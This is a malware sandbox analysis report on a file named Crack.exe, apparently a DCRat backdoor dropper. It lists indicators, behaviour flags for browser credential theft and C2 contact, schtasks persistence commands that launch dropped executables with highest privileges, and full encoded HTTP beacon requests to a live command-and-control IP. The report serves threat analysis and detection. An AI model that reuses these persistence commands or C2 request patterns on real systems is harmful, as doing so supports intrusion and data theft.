File name:

Crack.exe

Full analysis: https://app.any.run/tasks/03ee7134-0e06-4214-a391-edace4111234
Verdict: Malicious activity
Threats:

A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices.

Malware Trends Tracker     >>>
Analysis date: April 01, 2023, 12:36:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
rat
backdoor
dcrat
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

F8B29AC8C789DFB6648B12FC5D7864A1

SHA1:

BE8788B70CE54C592BFD47F29F962A655F953081

SHA256:

D9F58E101D377205A0EB569403B16572D30E78C54ACA01A2473F1F0FCDE9FC6A

SSDEEP:

49152:UbA30K1OMfWcVv6Y6feCfkOqg0yWEwwFywwtwWRifupv5Vp7foapzOkGfWDriGvU:UbcDucAs2l1FywTgWCD7QapzOkLDr5RC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • PortMonitor.exe (PID: 3548)
      • PortMonitor.exe (PID: 1204)
      • SearchProtocolHost.exe (PID: 2948)

    • UAC/LUA settings modification

      • PortMonitor.exe (PID: 3548)
      • PortMonitor.exe (PID: 1204)
      • SearchProtocolHost.exe (PID: 2948)

    • DCRAT was detected

      • SearchProtocolHost.exe (PID: 2948)

    • Steals credentials from Web Browsers

      • SearchProtocolHost.exe (PID: 2948)

    • Connects to the CnC server

      • SearchProtocolHost.exe (PID: 2948)

    • Actions looks like stealing of personal data

      • SearchProtocolHost.exe (PID: 2948)

  • SUSPICIOUS

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 3220)
      • PortMonitor.exe (PID: 1204)

    • Executable content was dropped or overwritten

      • Crack.exe (PID: 2964)
      • PortMonitor.exe (PID: 1204)
      • SearchProtocolHost.exe (PID: 2948)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 3220)
      • PortMonitor.exe (PID: 3548)
      • PortMonitor.exe (PID: 1204)

    • Reads the Internet Settings

      • wscript.exe (PID: 3220)
      • Crack.exe (PID: 2964)
      • PortMonitor.exe (PID: 3548)
      • PortMonitor.exe (PID: 1204)
      • SearchProtocolHost.exe (PID: 2948)

    • Executed via WMI

      • schtasks.exe (PID: 3072)
      • schtasks.exe (PID: 3648)
      • schtasks.exe (PID: 3724)
      • schtasks.exe (PID: 1592)
      • schtasks.exe (PID: 1744)
      • schtasks.exe (PID: 3912)
      • schtasks.exe (PID: 1792)
      • schtasks.exe (PID: 2724)
      • schtasks.exe (PID: 2916)
      • schtasks.exe (PID: 3192)
      • schtasks.exe (PID: 2380)
      • schtasks.exe (PID: 3488)
      • schtasks.exe (PID: 3996)
      • schtasks.exe (PID: 3340)
      • schtasks.exe (PID: 3084)

    • The process creates files with name similar to system file names

      • PortMonitor.exe (PID: 1204)

    • Creates executable files that already exist in Windows

      • PortMonitor.exe (PID: 1204)

    • Probably delay the execution using 'w32tm.exe'

      • cmd.exe (PID: 3856)

    • The process executes VB scripts

      • SearchProtocolHost.exe (PID: 2948)

    • Executes as Windows Service

      • VSSVC.exe (PID: 1576)

    • Reads browser cookies

      • SearchProtocolHost.exe (PID: 2948)

    • Loads DLL from Mozilla Firefox

      • SearchProtocolHost.exe (PID: 2948)

    • Connects to the server without a host name

      • SearchProtocolHost.exe (PID: 2948)

  • INFO

    • The process checks LSA protection

      • Crack.exe (PID: 2964)
      • PortMonitor.exe (PID: 3548)
      • PortMonitor.exe (PID: 1204)
      • SearchProtocolHost.exe (PID: 2948)
      • dllhost.exe (PID: 1648)
      • VSSVC.exe (PID: 1576)
      • wmpnscfg.exe (PID: 3728)

    • Reads the computer name

      • Crack.exe (PID: 2964)
      • PortMonitor.exe (PID: 3548)
      • PortMonitor.exe (PID: 1204)
      • SearchProtocolHost.exe (PID: 2948)
      • wmpnscfg.exe (PID: 3728)

    • Checks supported languages

      • Crack.exe (PID: 2964)
      • PortMonitor.exe (PID: 3548)
      • PortMonitor.exe (PID: 1204)
      • SearchProtocolHost.exe (PID: 2948)
      • wmpnscfg.exe (PID: 3728)

    • Reads product name

      • PortMonitor.exe (PID: 3548)
      • PortMonitor.exe (PID: 1204)
      • SearchProtocolHost.exe (PID: 2948)

    • Reads Environment values

      • PortMonitor.exe (PID: 3548)
      • PortMonitor.exe (PID: 1204)
      • SearchProtocolHost.exe (PID: 2948)

    • Reads the machine GUID from the registry

      • PortMonitor.exe (PID: 3548)
      • PortMonitor.exe (PID: 1204)
      • SearchProtocolHost.exe (PID: 2948)
      • wmpnscfg.exe (PID: 3728)

    • Process checks are UAC notifies on

      • PortMonitor.exe (PID: 3548)
      • PortMonitor.exe (PID: 1204)
      • SearchProtocolHost.exe (PID: 2948)

    • Creates files in the program directory

      • PortMonitor.exe (PID: 1204)

    • Create files in a temporary directory

      • PortMonitor.exe (PID: 1204)
      • SearchProtocolHost.exe (PID: 2948)

    • Manual execution by a user

      • wmpnscfg.exe (PID: 3728)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: -
OSVersion: 5.1
EntryPoint: 0x1ec40
UninitializedDataSize: -
InitializedDataSize: 255488
CodeSize: 201216
LinkerVersion: 14
PEType: PE32
ImageFileCharacteristics: Executable, 32-bit
TimeStamp: 2020:12:01 18:00:55+00:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 01-Dec-2020 18:00:55
Detected languages:
  • English - United States
Debug artifacts:
  • D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000118

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 6
Time date stamp: 01-Dec-2020 18:00:55
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x000310EA
0x00031200
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.70808
.rdata
0x00033000
0x0000A612
0x0000A800
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.22174
.data
0x0003E000
0x00023728
0x00001000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3.70882
.didat
0x00062000
0x00000188
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3.29825
.rsrc
0x00063000
0x0000DFD0
0x0000E000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
6.63675
.reloc
0x00071000
0x00002268
0x00002400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
6.55486

Resources

Title
Entropy
Size
Codepage
Language
Type
1
5.25329
1875
UNKNOWN
English - United States
RT_MANIFEST
2
5.10026
2216
UNKNOWN
English - United States
RT_ICON
3
5.25868
3752
UNKNOWN
English - United States
RT_ICON
4
5.02609
1128
UNKNOWN
English - United States
RT_ICON
5
5.18109
4264
UNKNOWN
English - United States
RT_ICON
6
5.04307
9640
UNKNOWN
English - United States
RT_ICON
7
3.1586
482
UNKNOWN
English - United States
RT_STRING
8
3.11685
460
UNKNOWN
English - United States
RT_STRING
9
3.11236
440
UNKNOWN
English - United States
RT_STRING
10
2.99727
326
UNKNOWN
English - United States
RT_STRING

Imports

KERNEL32.dll
USER32.dll (delay-loaded)
gdiplus.dll
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
72
Monitored processes
29
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start crack.exe wscript.exe no specs cmd.exe no specs portmonitor.exe no specs cmd.exe portmonitor.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs w32tm.exe no specs #DCRAT searchprotocolhost.exe wscript.exe no specs wscript.exe no specs SPPSurrogate no specs vssvc.exe no specs wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1204C:\winSaves\PortMonitor.exeC:\winSaves\PortMonitor.exe
cmd.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
1.1.1o
Modules
Images
c:\windows\system32\ntdll.dll
c:\winsaves\portmonitor.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
1576C:\Windows\system32\vssvc.exeC:\Windows\System32\VSSVC.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\vssvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1592schtasks.exe /create /tn "SearchFilterHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Desktop\SearchFilterHost.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
1648C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}C:\Windows\System32\dllhost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1744schtasks.exe /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0410-0000-0000000FF1CE}-C\SearchProtocolHost.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
1792schtasks.exe /create /tn "SearchProtocolHostS" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-001B-0410-0000-0000000FF1CE}-C\SearchProtocolHost.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2148w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 C:\Windows\System32\w32tm.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Time Service Diagnostic Tool
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\w32tm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2184"C:\Windows\System32\cmd.exe" /c "C:\winSaves\PortMonitor.exe"C:\Windows\System32\cmd.exe
PortMonitor.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2380schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0100-0412-0000-0000000FF1CE}-C\explorer.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2724schtasks.exe /create /tn "SearchFilterHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Desktop\SearchFilterHost.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
Total events
10 462
Read events
10 218
Write events
238
Delete events
6

Modification events

(PID) Process:(2964) Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2964) Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2964) Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2964) Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3220) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3220) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3220) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3220) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3548) PortMonitor.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:EnableLUA
Value:
1
(PID) Process:(3548) PortMonitor.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
Executable files
14
Suspicious files
0
Text files
24
Unknown types
30

Dropped files

PID
Process
Filename
Type
2964Crack.exeC:\winSaves\o0f7O9jVQUVK1.battext
MD5:
SHA256:
2964Crack.exeC:\winSaves\pI1ncDRKXOO.vbevbe
MD5:
SHA256:
1204PortMonitor.exeC:\ProgramData\Microsoft Help\3493c6ec4133a5text
MD5:
SHA256:
2964Crack.exeC:\winSaves\PortMonitor.exeexecutable
MD5:
SHA256:
1204PortMonitor.exeC:\MSOCache\All Users\{90140000-0100-0412-0000-0000000FF1CE}-C\explorer.exeexecutable
MD5:
SHA256:
1204PortMonitor.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\spoolsv.exeexecutable
MD5:
SHA256:
1204PortMonitor.exeC:\Users\admin\AppData\Local\Temp\aNa3Lme8Pe.battext
MD5:
SHA256:
1204PortMonitor.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\f3b6ecef712a24text
MD5:
SHA256:
2948SearchProtocolHost.exeC:\Users\admin\AppData\Local\Temp\41820f9a-1819-4275-9c7d-341337874ac4.vbstext
MD5:
SHA256:
2948SearchProtocolHost.exeC:\Users\admin\AppData\Local\Temp\d1cce252-5c18-4f22-8358-981bc869df06.vbstext
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
38
TCP/UDP connections
2
DNS requests
0
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2948
SearchProtocolHost.exe
GET
45.156.84.108:80
http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&cdcb8a5f0961cc7a07b5ac3d675f9811=0VfiAjRaxmUuNGaSNzYnRzVh5mVIJWUCNFTnBTRVdWTU1kNjpXT2UERJpXSE1Ue4MVT2FleXJiOicDMmNWM0YzMhJmZ3QDM1EGOwgDMwAjMzQGM3YmN0EGOiwiI5UGZ3EjY1MmMmljNzEGZ4IzY0QjZiN2NmRDM5UGOkBDOkFzY0kDNiJiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W
NL
malicious
2948
SearchProtocolHost.exe
POST
200
45.156.84.108:80
http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY
NL
text
104 b
malicious
2948
SearchProtocolHost.exe
GET
200
45.156.84.108:80
http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?B7WkvJxoCjhkr2VmyI9UhH21wKHer=vMSvVYlDKw8&Q5gRFbxRd0fQX3FexkBS7=yUR6h6Au7NV216VeFqrZ04r&bcc31a2d967b731818da98c237e4d99f=8718086f666781861db7ec0ee0e18bc3&cec6b04b0668728de3a6b2a93639588c=QZmNmNzETY3QWZ1IDOyYmYxkjNjVDO1IGOyAzNxczMjFWNjFmYjJmM&B7WkvJxoCjhkr2VmyI9UhH21wKHer=vMSvVYlDKw8&Q5gRFbxRd0fQX3FexkBS7=yUR6h6Au7NV216VeFqrZ04r
NL
text
2.05 Kb
malicious
2948
SearchProtocolHost.exe
GET
200
45.156.84.108:80
http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nI4ETZ0YGOjFWZ4ETM3QTYmRTO2cDM4UGNiVDNwUjZ3UjNzUTYhFTY0IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W&4b3ed01d1b7d17d2374397bcf88db6a2=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
NL
text
104 b
malicious
2948
SearchProtocolHost.exe
GET
200
45.156.84.108:80
http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nI4ETZ0YGOjFWZ4ETM3QTYmRTO2cDM4UGNiVDNwUjZ3UjNzUTYhFTY0IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W&4b3ed01d1b7d17d2374397bcf88db6a2=d1nIiojI3AjZjFDN2MTYiZ2N0ATNhhDM4ADMwIzMkBzNmZDNhhjIsICOxUGNmhzYhVGOxEzN0EmZ0kjN3ADOlRjY1QDM1Y2N1YzM1EWYxEGNiojI3ETZwEWO5IT